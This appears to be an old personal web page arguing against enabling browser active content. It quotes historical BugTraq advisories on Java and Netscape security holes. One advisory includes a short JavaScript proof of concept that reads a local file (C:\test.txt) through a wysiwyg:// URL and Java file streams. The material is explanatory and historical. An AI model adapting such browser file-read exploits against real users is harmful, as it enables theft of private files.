When I say that I avoid active content, I am referring to Java, Javascript, ActiveX, and the like. After so many people have tried for so many years to unsuccessfully build a sandbox, I think it is time to conclude that sandbox technology should be used to prevent accidents by trusted, well-intentioned programmers, but not relied upon for running unsigned, possibly malicious code.
The following stories are very old; I don't bother to list more recent problems, which are scarcer but nevertheless worrisome.

IE can be tricked into revealing cookies from any site 

To: BugTraq
Subject: Dangerous Java/Netscape Security Hole
Date: Fri Aug 04 2000 18:04:29
Author: Dan Brumleve

I've found some security holes in Java and Netscape
that allow arbitrary network access and read-access
for local files and directories.  As a demonstration
I've written Brown Orifice HTTPD, a web server and file
sharing tool that runs in Netscape Communicator on all
tested platforms.  For more information, see:
http://www.brumleve.com/BrownOrifice

A recent example that has attracted some attention is cross-site scripting. Bugtraq says that Microsoft JVM allows reading local files using getSystemResourceAsStream. (http://java-house.etl.go.jp/ml/archive/j-h-b/030411.html) ActiveX and VisualBasic exploits are too numerous to mention.

Another startling recent example is:

To:BugTraq
Subject:Netscape Communicator 4.5 can read local files
Date:Mon Nov 23 1998 09:36:40
Author:Georgi Guninski

There is a bug in Netscape Communicator 4.5 for Windows 95 and 4.05 for
WinNT 4.0
(probably others) which allows reading files from the user's computer.
It is not necessary the file name to be known, because directories may
be browsed.
The contents of the file may be sent to an arbitrary host. In order this
to work, you need both Java and Javascript
enabled. The bug may be exploited by email message.

Demonstration is available at:
http://www.geocities.com/ResearchTriangle/1711/b6.html

Workaround: Disable Javascript or Java.


The Javascript code is:

sl=window.open("wysiwyg://1/file:///C|/");
sl2=sl.window.open();
sl2.location="javascript:s='<SCRIPT>b=\"Here is the beginning of your
file: \";var f = new java.io.File(\"C:\\\\\\\\test.txt\");var fis = new
java.io.FileInputStream(f); i=0; while ( ((a=fis.read()) != -1) &&
(i<100) ) { b += String.fromCharCode(a);i++;}alert(b);</'+'SCRIPT>'";

Regards,
Georgi Guninski
http://www.geocities.com/ResearchTriangle/1711
Another bug in the way Microsoft's IE handles Java, Javascript and DOM makes your machine similarly vulnerable.

Some older exploits: LoVerso, McGraw, Felten, Kimera, JavaSoft, www-security-faq 8 July 1997 CERT advisory

I can't close with pointing to my favorite computer security story of all time: Ken Thompson's Reflections on Trusting Trust.